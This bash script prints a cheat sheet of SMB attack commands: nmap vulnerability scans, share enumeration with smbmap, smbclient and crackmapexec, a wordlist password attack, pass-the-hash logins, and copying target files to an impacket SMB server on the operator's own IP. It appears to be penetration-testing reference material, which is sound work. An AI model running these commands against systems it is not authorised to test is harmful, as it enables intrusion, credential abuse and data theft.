#!/bin/bash

# display smb enumeration and exploitation commands 

Frame='\033[0;32m'   # Green
Link='\033[0;35m'  	 # Purple
Title='\033[1;33m' 	 # Bold Yellow
Comment='\033[0;36m' # Cyan
End='\033[0m'		 # No Color
Point='\033[0;31m[*]\033[0m'

ip=$(/sbin/ip -o -4 addr list tun0 | awk '{print $4}' | cut -d/ -f1) 2>/dev/null

if [ "$ip" == "" ]; then
	ip=$(/sbin/ip -o -4 addr list eth0 | awk '{print $4}' | cut -d/ -f1)
fi

echo -e "${Frame}###${End} ${Title}Nmap${End} ${Frame}###${End}"
echo -e "${Point} nmap -T4 --script smb-enum-* -p 139,445 \$IP"
echo -e "${Point} nmap -T4 --script smb-vuln-* -p 139,445 \$IP"
echo -e ""


echo -e "${Frame}###${End} ${Title}Smbmap${End} ${Frame}###${End}"
echo -e "${Point} smbmap -H \$IP"
echo -e "${Point} smbmap -u whatever -H \$IP"
echo -e "${Point} smbmap -u \$user -p \$password -H \$IP"
echo -e "${Point} smbmap -R \$share -H \$IP -A \$file -q #"
echo -e ""


echo -e "${Frame}###${End} ${Title}Smbclient${End} ${Frame}###${End}"
echo -e "${Point} smbclient \\\\\\\\\$IP\\\\\$share"
echo -e ""


echo -e "${Frame}###${End} ${Title}Crackmapexec${End} ${Frame}###${End}"
echo -e "${Link}https://wiki.porchetta.industries/${End}"
echo -e "${Point} crackmapexec smb -u 'whatever' -p '' --shares \$IP"
echo -e "${Point} crackmapexec smb -u '\$user' -p '\$password' --shares \$IP"
echo -e "${Point} crackmapexec smb -u '\$user' -H '\$hash' --shares \$IP"
echo -e "${Point} crackmapexec smb -u '\$user' -p \$wordlist --shares \$IP"
echo -e ""


echo -e "${Frame}###${End} ${Title}Mounting${End} ${Frame}###${End}"
echo -e "${Point} sudo mount -t cifs //\$IP/\$share /mnt/\$share -o user=,password="
echo -e "${Point} sudo umount /mnt/\$share"
echo -e ""


echo -e "${Frame}###${End} ${Title}Virtual Hard Disk (mount)${End} ${Frame}###${End}"
echo -e "${Point} 7z l vhdfile.vhd"
echo -e "${Point} sudo guestmount --add /mnt/remote/path/to/vhdfile.vhd --inspector --ro /mnt/vhd/ -v"
echo -e ""


echo -e "${Frame}###${End} ${Title}Files Transfer${End} ${Frame}###${End}"
echo -e "${Point} impacket-smbserver smb_share . ${Comment}# server${End}"
echo -e "    net use * \\\\$ip\smb_share ${Comment}# client${End}"
echo -e "    copy Z:\\\file.txt ${Comment}# get from server${End}"
echo -e "    copy file.txt Z:\\ ${Comment}# sent to server${End}"
